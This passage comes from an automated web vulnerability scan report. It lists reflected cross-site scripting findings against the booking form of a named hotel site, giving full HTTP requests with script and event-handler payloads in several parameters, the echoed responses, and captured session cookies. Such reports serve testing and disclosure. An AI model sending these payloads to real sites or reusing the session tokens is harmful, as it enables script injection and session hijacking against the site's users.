The value of the numberOfChildren request parameter is copied into the HTML document as plain text between tags. The payload 91311<script>alert(1)</script>6f2b54e81f4 was submitted in the numberOfChildren parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

POST /Accept/Reserve.cfm?sslsite=HOTELPLANNER.COM&locale=en_US&currency=USD HTTP/1.1
Host: www.hotelplanner.com
Connection: keep-alive
Content-Length: 1446
Cache-Control: max-age=0
Origin: http://www.hotelplanner.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.hotelplanner.com/Hotel/HotelRoomTypes.cfm?hotelID=113791&inDate=10/04/11&outDate=10/07/11&NumRooms=1&hrnQuoteKey=c6d7ef83-2fb9-429a-9916-19c05c46dbab
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=63063151; CFTOKEN=b435e7611cfab07e-C71CEF9A-1372-5005-24C466871C472C41; SOURCECODE=IGoUGo; TLTSID=F123A950ED5310ED160FDD8181683406; TLTUID=F123A950ED5310ED160FDD8181683406; TRAFFICID=15786488; SCREENWIDTH=1920; SCREENHEIGHT=1200; LOCALE=en%5FUS; CURRENCY=USD; __utma=69973641.2138588342.1317600610.1317600610.1317600610.1; __utmb=69973641.3.10.1317600610; __utmc=69973641; __utmz=69973641.1317600610.1.1.utmcsr=drf-global.com|utmccn=(referral)|utmcmd=referral|utmcct=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf; LANGUAGE=1

cid=82686&locale=en_US&creditCardLastName=&numberOfAdults=2&numberOfChildren=091311<script>alert(1)</script>6f2b54e81f4&numberOfRooms=1&departureDay=7&departureMonth=9&departureYear=2011&arrivalDay=4&arrivalMonth=9&arrivalYear=2011&rateFrequency=B&nativeRoomRate=1434.2&nativeCurrencyCode=USD&extraPersonFees=&chargeabl
...[SNIP]...

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 03 Oct 2011 00:32:40 GMT
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
P3P: CP='NOI DSP COR LAW NID CUR ADMa OUR DELa IND PHY ONL UNI PUR COM NAV STA'
Set-Cookie: LOCALE=en%5FUS;path=/
Set-Cookie: CURRENCY=USD;path=/
Set-Cookie: LANGUAGE=1;path=/
Vary: Accept-Encoding
Content-Length: 58988

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
   <html>
       <head>
       <title>Book Now - Submit Secure Hotel Reservation</title>
       <meta http-equiv="Content-Type" content="text/html; ch
...[SNIP]...
<br>
                   Adults: 2&nbsp;&nbsp;Children: 091311<script>alert(1)</script>6f2b54e81f4
                   <div align="right">
...[SNIP]...
4.307. https://www.hotelplanner.com/Accept/Reserve.cfm [numberOfRooms parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.hotelplanner.com
Path:   /Accept/Reserve.cfm

Issue detail

The value of the numberOfRooms request parameter is copied into an HTML comment. The payload 27273--><img%20src%3da%20onerror%3dalert(1)>cc789263516 was submitted in the numberOfRooms parameter. This input was echoed as 27273--><img src=a onerror=alert(1)>cc789263516 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

POST /Accept/Reserve.cfm?sslsite=HOTELPLANNER.COM&locale=en_US&currency=USD HTTP/1.1
Host: www.hotelplanner.com
Connection: keep-alive
Content-Length: 1446
Cache-Control: max-age=0
Origin: http://www.hotelplanner.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.hotelplanner.com/Hotel/HotelRoomTypes.cfm?hotelID=113791&inDate=10/04/11&outDate=10/07/11&NumRooms=1&hrnQuoteKey=c6d7ef83-2fb9-429a-9916-19c05c46dbab
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=63063151; CFTOKEN=b435e7611cfab07e-C71CEF9A-1372-5005-24C466871C472C41; SOURCECODE=IGoUGo; TLTSID=F123A950ED5310ED160FDD8181683406; TLTUID=F123A950ED5310ED160FDD8181683406; TRAFFICID=15786488; SCREENWIDTH=1920; SCREENHEIGHT=1200; LOCALE=en%5FUS; CURRENCY=USD; __utma=69973641.2138588342.1317600610.1317600610.1317600610.1; __utmb=69973641.3.10.1317600610; __utmc=69973641; __utmz=69973641.1317600610.1.1.utmcsr=drf-global.com|utmccn=(referral)|utmcmd=referral|utmcct=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf; LANGUAGE=1

cid=82686&locale=en_US&creditCardLastName=&numberOfAdults=2&numberOfChildren=0&numberOfRooms=127273--><img%20src%3da%20onerror%3dalert(1)>cc789263516&departureDay=7&departureMonth=9&departureYear=2011&arrivalDay=4&arrivalMonth=9&arrivalYear=2011&rateFrequency=B&nativeRoomRate=1434.2&nativeCurrencyCode=USD&extraPersonFees=&chargeableRoomRateTaxesAn
...[SNIP]...

Response

HTTP/1.1 503 Service Temporarily Unavailable
Connection: close
Date: Mon, 03 Oct 2011 00:32:51 GMT
Server: Microsoft-IIS/6.0
P3P: CP='NOI DSP COR LAW NID CUR ADMa OUR DELa IND PHY ONL UNI PUR COM NAV STA'
Set-Cookie: LOCALE=en%5FUS;path=/
Set-Cookie: CURRENCY=USD;path=/
Set-Cookie: LANGUAGE=1;path=/
Content-Type: text/html; charset=UTF-8
retry-after: 3600

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
   <html>
       <head>
       <title>Page Not Available</title>
       <meta http-equiv="Content-Type" content="text/html; charset=utf-8">
       <meta h
...[SNIP]...
<!--

Diagnostic Information:
The value 127273--><img src=a onerror=alert(1)>cc789263516 cannot be converted to a number. <br>
...[SNIP]...
4.308. https://www.hotelplanner.com/Accept/Reserve.cfm [promoDescription parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.hotelplanner.com
Path:   /Accept/Reserve.cfm

Issue detail

The value of the promoDescription request parameter is copied into the HTML document as plain text between tags. The payload 1216d<script>alert(1)</script>7374d724c38 was submitted in the promoDescription parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

POST /Accept/Reserve.cfm?sslsite=HOTELPLANNER.COM&locale=en_US&currency=USD HTTP/1.1
Host: www.hotelplanner.com
Connection: keep-alive
Content-Length: 1446
Cache-Control: max-age=0
Origin: http://www.hotelplanner.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.hotelplanner.com/Hotel/HotelRoomTypes.cfm?hotelID=113791&inDate=10/04/11&outDate=10/07/11&NumRooms=1&hrnQuoteKey=c6d7ef83-2fb9-429a-9916-19c05c46dbab
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=63063151; CFTOKEN=b435e7611cfab07e-C71CEF9A-1372-5005-24C466871C472C41; SOURCECODE=IGoUGo; TLTSID=F123A950ED5310ED160FDD8181683406; TLTUID=F123A950ED5310ED160FDD8181683406; TRAFFICID=15786488; SCREENWIDTH=1920; SCREENHEIGHT=1200; LOCALE=en%5FUS; CURRENCY=USD; __utma=69973641.2138588342.1317600610.1317600610.1317600610.1; __utmb=69973641.3.10.1317600610; __utmc=69973641; __utmz=69973641.1317600610.1.1.utmcsr=drf-global.com|utmccn=(referral)|utmcmd=referral|utmcct=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf; LANGUAGE=1

cid=82686&locale=en_US&creditCardLastName=&numberOfAdults=2&numberOfChildren=0&numberOfRooms=1&departureDay=7&departureMonth=9&departureYear=2011&arrivalDay=4&arrivalMonth=9&arrivalYear=2011&rateFrequ
...[SNIP]...
omRateTotal=1434.2&displayRoomRate=1434.2&NativeNightlyRates=429.49%2C429.49%2C369.23&DisplayNightlyRates=429.49%2C429.49%2C369.23&displayCurrencyCode=USD&promoType=&propertyID=15159&promoDescription=1216d<script>alert(1)</script>7374d724c38&immediateChargeRequired=true&depositRequired=true&guaranteeRequired=false&rateChange=true&taxRate=205.99&propertyType=H&supplierType=H&roomTypeDescription=Superior+Room+1+King+Bed&bedTypes=14%7CKing+
...[SNIP]...

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 03 Oct 2011 00:35:25 GMT
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
P3P: CP='NOI DSP COR LAW NID CUR ADMa OUR DELa IND PHY ONL UNI PUR COM NAV STA'
Set-Cookie: LOCALE=en%5FUS;path=/
Set-Cookie: CURRENCY=USD;path=/
Set-Cookie: LANGUAGE=1;path=/
Vary: Accept-Encoding
Content-Length: 59105

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
   <html>
       <head>
       <title>Book Now - Submit Secure Hotel Reservation</title>
       <meta http-equiv="Content-Type" content="text/html; ch
...[SNIP]...
<font color="3865a8">1216d<script>alert(1)</script>7374d724c38</font>
...[SNIP]...
4.309. https://www.hotelplanner.com/Accept/Reserve.cfm [promoDescription parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.hotelplanner.com
Path:   /Accept/Reserve.cfm

Issue detail

The value of the promoDescription request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9d50c"><script>alert(1)</script>f302cb1ee7a was submitted in the promoDescription parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

POST /Accept/Reserve.cfm?sslsite=HOTELPLANNER.COM&locale=en_US&currency=USD HTTP/1.1
Host: www.hotelplanner.com
Connection: keep-alive
Content-Length: 1446
Cache-Control: max-age=0
Origin: http://www.hotelplanner.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.hotelplanner.com/Hotel/HotelRoomTypes.cfm?hotelID=113791&inDate=10/04/11&outDate=10/07/11&NumRooms=1&hrnQuoteKey=c6d7ef83-2fb9-429a-9916-19c05c46dbab
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=63063151; CFTOKEN=b435e7611cfab07e-C71CEF9A-1372-5005-24C466871C472C41; SOURCECODE=IGoUGo; TLTSID=F123A950ED5310ED160FDD8181683406; TLTUID=F123A950ED5310ED160FDD8181683406; TRAFFICID=15786488; SCREENWIDTH=1920; SCREENHEIGHT=1200; LOCALE=en%5FUS; CURRENCY=USD; __utma=69973641.2138588342.1317600610.1317600610.1317600610.1; __utmb=69973641.3.10.1317600610; __utmc=69973641; __utmz=69973641.1317600610.1.1.utmcsr=drf-global.com|utmccn=(referral)|utmcmd=referral|utmcct=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf; LANGUAGE=1

cid=82686&locale=en_US&creditCardLastName=&numberOfAdults=2&numberOfChildren=0&numberOfRooms=1&departureDay=7&departureMonth=9&departureYear=2011&arrivalDay=4&arrivalMonth=9&arrivalYear=2011&rateFrequ
...[SNIP]...
omRateTotal=1434.2&displayRoomRate=1434.2&NativeNightlyRates=429.49%2C429.49%2C369.23&DisplayNightlyRates=429.49%2C429.49%2C369.23&displayCurrencyCode=USD&promoType=&propertyID=15159&promoDescription=9d50c"><script>alert(1)</script>f302cb1ee7a&immediateChargeRequired=true&depositRequired=true&guaranteeRequired=false&rateChange=true&taxRate=205.99&propertyType=H&supplierType=H&roomTypeDescription=Superior+Room+1+King+Bed&bedTypes=14%7CKing+
...[SNIP]...

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 03 Oct 2011 00:35:24 GMT
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
P3P: CP='NOI DSP COR LAW NID CUR ADMa OUR DELa IND PHY ONL UNI PUR COM NAV STA'
Set-Cookie: LOCALE=en%5FUS;path=/
Set-Cookie: CURRENCY=USD;path=/
Set-Cookie: LANGUAGE=1;path=/
Vary: Accept-Encoding
Content-Length: 59111

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
   <html>
       <head>
       <title>Book Now - Submit Secure Hotel Reservation</title>
       <meta http-equiv="Content-Type" content="text/html; ch
...[SNIP]...
<input type="hidden" name="promoDescription" value="9d50c"><script>alert(1)</script>f302cb1ee7a">
...[SNIP]...
4.310. https://www.hotelplanner.com/Accept/Reserve.cfm [promoType parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.hotelplanner.com
Path:   /Accept/Reserve.cfm

Issue detail

The value of the promoType request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7b617"><script>alert(1)</script>f2b3557c9b0 was submitted in the promoType parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

POST /Accept/Reserve.cfm?sslsite=HOTELPLANNER.COM&locale=en_US&currency=USD HTTP/1.1
Host: www.hotelplanner.com
Connection: keep-alive
Content-Length: 1446
Cache-Control: max-age=0
Origin: http://www.hotelplanner.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.hotelplanner.com/Hotel/HotelRoomTypes.cfm?hotelID=113791&inDate=10/04/11&outDate=10/07/11&NumRooms=1&hrnQuoteKey=c6d7ef83-2fb9-429a-9916-19c05c46dbab
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=63063151; CFTOKEN=b435e7611cfab07e-C71CEF9A-1372-5005-24C466871C472C41; SOURCECODE=IGoUGo; TLTSID=F123A950ED5310ED160FDD8181683406; TLTUID=F123A950ED5310ED160FDD8181683406; TRAFFICID=15786488; SCREENWIDTH=1920; SCREENHEIGHT=1200; LOCALE=en%5FUS; CURRENCY=USD; __utma=69973641.2138588342.1317600610.1317600610.1317600610.1; __utmb=69973641.3.10.1317600610; __utmc=69973641; __utmz=69973641.1317600610.1.1.utmcsr=drf-global.com|utmccn=(referral)|utmcmd=referral|utmcct=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf; LANGUAGE=1

cid=82686&locale=en_US&creditCardLastName=&numberOfAdults=2&numberOfChildren=0&numberOfRooms=1&departureDay=7&departureMonth=9&departureYear=2011&arrivalDay=4&arrivalMonth=9&arrivalYear=2011&rateFrequ
...[SNIP]...
ateTaxesAndFees=205.99&chargeableRoomRateTotal=1434.2&displayRoomRate=1434.2&NativeNightlyRates=429.49%2C429.49%2C369.23&DisplayNightlyRates=429.49%2C429.49%2C369.23&displayCurrencyCode=USD&promoType=7b617"><script>alert(1)</script>f2b3557c9b0&propertyID=15159&promoDescription=&immediateChargeRequired=true&depositRequired=true&guaranteeRequired=false&rateChange=true&taxRate=205.99&propertyType=H&supplierType=H&roomTypeDescription=Superior+
...[SNIP]...

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 03 Oct 2011 00:35:16 GMT
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
P3P: CP='NOI DSP COR LAW NID CUR ADMa OUR DELa IND PHY ONL UNI PUR COM NAV STA'
Set-Cookie: LOCALE=en%5FUS;path=/
Set-Cookie: CURRENCY=USD;path=/
Set-Cookie: LANGUAGE=1;path=/
Vary: Accept-Encoding
Content-Length: 58867

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
   <html>
       <head>
       <title>Book Now - Submit Secure Hotel Reservation</title>
       <meta http-equiv="Content-Type" content="text/html; ch
...[SNIP]...
<input type="hidden" name="promoType" value="7b617"><script>alert(1)</script>f2b3557c9b0">
...[SNIP]...
4.311. https://www.hotelplanner.com/Accept/Reserve.cfm [propertyID parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.hotelplanner.com
Path:   /Accept/Reserve.cfm

Issue detail

The value of the propertyID request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b8fa7"><script>alert(1)</script>bb450458818 was submitted in the propertyID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

POST /Accept/Reserve.cfm?sslsite=HOTELPLANNER.COM&locale=en_US&currency=USD HTTP/1.1
Host: www.hotelplanner.com
Connection: keep-alive
Content-Length: 1446
Cache-Control: max-age=0
Origin: http://www.hotelplanner.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.hotelplanner.com/Hotel/HotelRoomTypes.cfm?hotelID=113791&inDate=10/04/11&outDate=10/07/11&NumRooms=1&hrnQuoteKey=c6d7ef83-2fb9-429a-9916-19c05c46dbab
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=63063151; CFTOKEN=b435e7611cfab07e-C71CEF9A-1372-5005-24C466871C472C41; SOURCECODE=IGoUGo; TLTSID=F123A950ED5310ED160FDD8181683406; TLTUID=F123A950ED5310ED160FDD8181683406; TRAFFICID=15786488; SCREENWIDTH=1920; SCREENHEIGHT=1200; LOCALE=en%5FUS; CURRENCY=USD; __utma=69973641.2138588342.1317600610.1317600610.1317600610.1; __utmb=69973641.3.10.1317600610; __utmc=69973641; __utmz=69973641.1317600610.1.1.utmcsr=drf-global.com|utmccn=(referral)|utmcmd=referral|utmcct=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf; LANGUAGE=1

cid=82686&locale=en_US&creditCardLastName=&numberOfAdults=2&numberOfChildren=0&numberOfRooms=1&departureDay=7&departureMonth=9&departureYear=2011&arrivalDay=4&arrivalMonth=9&arrivalYear=2011&rateFrequ
...[SNIP]...
05.99&chargeableRoomRateTotal=1434.2&displayRoomRate=1434.2&NativeNightlyRates=429.49%2C429.49%2C369.23&DisplayNightlyRates=429.49%2C429.49%2C369.23&displayCurrencyCode=USD&promoType=&propertyID=15159b8fa7"><script>alert(1)</script>bb450458818&promoDescription=&immediateChargeRequired=true&depositRequired=true&guaranteeRequired=false&rateChange=true&taxRate=205.99&propertyType=H&supplierType=H&roomTypeDescription=Superior+Room+1+King+Bed&b
...[SNIP]...

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 03 Oct 2011 00:35:20 GMT
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
P3P: CP='NOI DSP COR LAW NID CUR ADMa OUR DELa IND PHY ONL UNI PUR COM NAV STA'
Set-Cookie: LOCALE=en%5FUS;path=/
Set-Cookie: CURRENCY=USD;path=/
Set-Cookie: LANGUAGE=1;path=/
Vary: Accept-Encoding
Content-Length: 58867

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
   <html>
       <head>
       <title>Book Now - Submit Secure Hotel Reservation</title>
       <meta http-equiv="Content-Type" content="text/html; ch
...[SNIP]...
<input type="hidden" name="propertyID" value="15159b8fa7"><script>alert(1)</script>bb450458818">
...[SNIP]...
4.312. https://www.hotelplanner.com/Accept/Reserve.cfm [propertyType parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.hotelplanner.com
Path:   /Accept/Reserve.cfm

Issue detail

The value of the propertyType request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 949b0"><script>alert(1)</script>2ab353c7bc2 was submitted in the propertyType parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

POST /Accept/Reserve.cfm?sslsite=HOTELPLANNER.COM&locale=en_US&currency=USD HTTP/1.1
Host: www.hotelplanner.com
Connection: keep-alive
Content-Length: 1446
Cache-Control: max-age=0
Origin: http://www.hotelplanner.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.hotelplanner.com/Hotel/HotelRoomTypes.cfm?hotelID=113791&inDate=10/04/11&outDate=10/07/11&NumRooms=1&hrnQuoteKey=c6d7ef83-2fb9-429a-9916-19c05c46dbab
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=63063151; CFTOKEN=b435e7611cfab07e-C71CEF9A-1372-5005-24C466871C472C41; SOURCECODE=IGoUGo; TLTSID=F123A950ED5310ED160FDD8181683406; TLTUID=F123A950ED5310ED160FDD8181683406; TRAFFICID=15786488; SCREENWIDTH=1920; SCREENHEIGHT=1200; LOCALE=en%5FUS; CURRENCY=USD; __utma=69973641.2138588342.1317600610.1317600610.1317600610.1; __utmb=69973641.3.10.1317600610; __utmc=69973641; __utmz=69973641.1317600610.1.1.utmcsr=drf-global.com|utmccn=(referral)|utmcmd=referral|utmcct=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf; LANGUAGE=1

cid=82686&locale=en_US&creditCardLastName=&numberOfAdults=2&numberOfChildren=0&numberOfRooms=1&departureDay=7&departureMonth=9&departureYear=2011&arrivalDay=4&arrivalMonth=9&arrivalYear=2011&rateFrequ
...[SNIP]...
9%2C369.23&displayCurrencyCode=USD&promoType=&propertyID=15159&promoDescription=&immediateChargeRequired=true&depositRequired=true&guaranteeRequired=false&rateChange=true&taxRate=205.99&propertyType=H949b0"><script>alert(1)</script>2ab353c7bc2&supplierType=H&roomTypeDescription=Superior+Room+1+King+Bed&bedTypes=14%7CKing+Bed&bedType=14&rateDescription=Superior+Room+1+King+Bed&ValueAdds=&hrnQuoteKey=9f715d9d-c49b-4dea-841d-bf8e7f684953&room
...[SNIP]...

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 03 Oct 2011 00:35:51 GMT
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
P3P: CP='NOI DSP COR LAW NID CUR ADMa OUR DELa IND PHY ONL UNI PUR COM NAV STA'
Set-Cookie: LOCALE=en%5FUS;path=/
Set-Cookie: CURRENCY=USD;path=/
Set-Cookie: LANGUAGE=1;path=/
Vary: Accept-Encoding
Content-Length: 58867

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
   <html>
       <head>
       <title>Book Now - Submit Secure Hotel Reservation</title>
       <meta http-equiv="Content-Type" content="text/html; ch
...[SNIP]...
<input type="hidden" name="propertyType" value="H949b0"><script>alert(1)</script>2ab353c7bc2">
...[SNIP]...
4.313. https://www.hotelplanner.com/Accept/Reserve.cfm [rateChange parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.hotelplanner.com
Path:   /Accept/Reserve.cfm

Issue detail

The value of the rateChange request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 265cb"><script>alert(1)</script>edc7ebe0c7d was submitted in the rateChange parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

POST /Accept/Reserve.cfm?sslsite=HOTELPLANNER.COM&locale=en_US&currency=USD HTTP/1.1
Host: www.hotelplanner.com
Connection: keep-alive
Content-Length: 1446
Cache-Control: max-age=0
Origin: http://www.hotelplanner.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.hotelplanner.com/Hotel/HotelRoomTypes.cfm?hotelID=113791&inDate=10/04/11&outDate=10/07/11&NumRooms=1&hrnQuoteKey=c6d7ef83-2fb9-429a-9916-19c05c46dbab
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=63063151; CFTOKEN=b435e7611cfab07e-C71CEF9A-1372-5005-24C466871C472C41; SOURCECODE=IGoUGo; TLTSID=F123A950ED5310ED160FDD8181683406; TLTUID=F123A950ED5310ED160FDD8181683406; TRAFFICID=15786488; SCREENWIDTH=1920; SCREENHEIGHT=1200; LOCALE=en%5FUS; CURRENCY=USD; __utma=69973641.2138588342.1317600610.1317600610.1317600610.1; __utmb=69973641.3.10.1317600610; __utmc=69973641; __utmz=69973641.1317600610.1.1.utmcsr=drf-global.com|utmccn=(referral)|utmcmd=referral|utmcct=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf; LANGUAGE=1

cid=82686&locale=en_US&creditCardLastName=&numberOfAdults=2&numberOfChildren=0&numberOfRooms=1&departureDay=7&departureMonth=9&departureYear=2011&arrivalDay=4&arrivalMonth=9&arrivalYear=2011&rateFrequ
...[SNIP]...
layNightlyRates=429.49%2C429.49%2C369.23&displayCurrencyCode=USD&promoType=&propertyID=15159&promoDescription=&immediateChargeRequired=true&depositRequired=true&guaranteeRequired=false&rateChange=true265cb"><script>alert(1)</script>edc7ebe0c7d&taxRate=205.99&propertyType=H&supplierType=H&roomTypeDescription=Superior+Room+1+King+Bed&bedTypes=14%7CKing+Bed&bedType=14&rateDescription=Superior+Room+1+King+Bed&ValueAdds=&hrnQuoteKey=9f715d9d-c4
...[SNIP]...

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 03 Oct 2011 00:35:44 GMT
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
P3P: CP='NOI DSP COR LAW NID CUR ADMa OUR DELa IND PHY ONL UNI PUR COM NAV STA'
Set-Cookie: LOCALE=en%5FUS;path=/
Set-Cookie: CURRENCY=USD;path=/
Set-Cookie: LANGUAGE=1;path=/
Vary: Accept-Encoding
Content-Length: 58867

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
   <html>
       <head>
       <title>Book Now - Submit Secure Hotel Reservation</title>
       <meta http-equiv="Content-Type" content="text/html; ch
...[SNIP]...
<input type="hidden" name="rateChange" value="true265cb"><script>alert(1)</script>edc7ebe0c7d">
...[SNIP]...
4.314. https://www.hotelplanner.com/Accept/Reserve.cfm [rateCode parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.hotelplanner.com
Path:   /Accept/Reserve.cfm

Issue detail

The value of the rateCode request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8fab0"><script>alert(1)</script>f908b250ca1 was submitted in the rateCode parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

POST /Accept/Reserve.cfm?sslsite=HOTELPLANNER.COM&locale=en_US&currency=USD HTTP/1.1
Host: www.hotelplanner.com
Connection: keep-alive
Content-Length: 1446
Cache-Control: max-age=0
Origin: http://www.hotelplanner.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.hotelplanner.com/Hotel/HotelRoomTypes.cfm?hotelID=113791&inDate=10/04/11&outDate=10/07/11&NumRooms=1&hrnQuoteKey=c6d7ef83-2fb9-429a-9916-19c05c46dbab
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
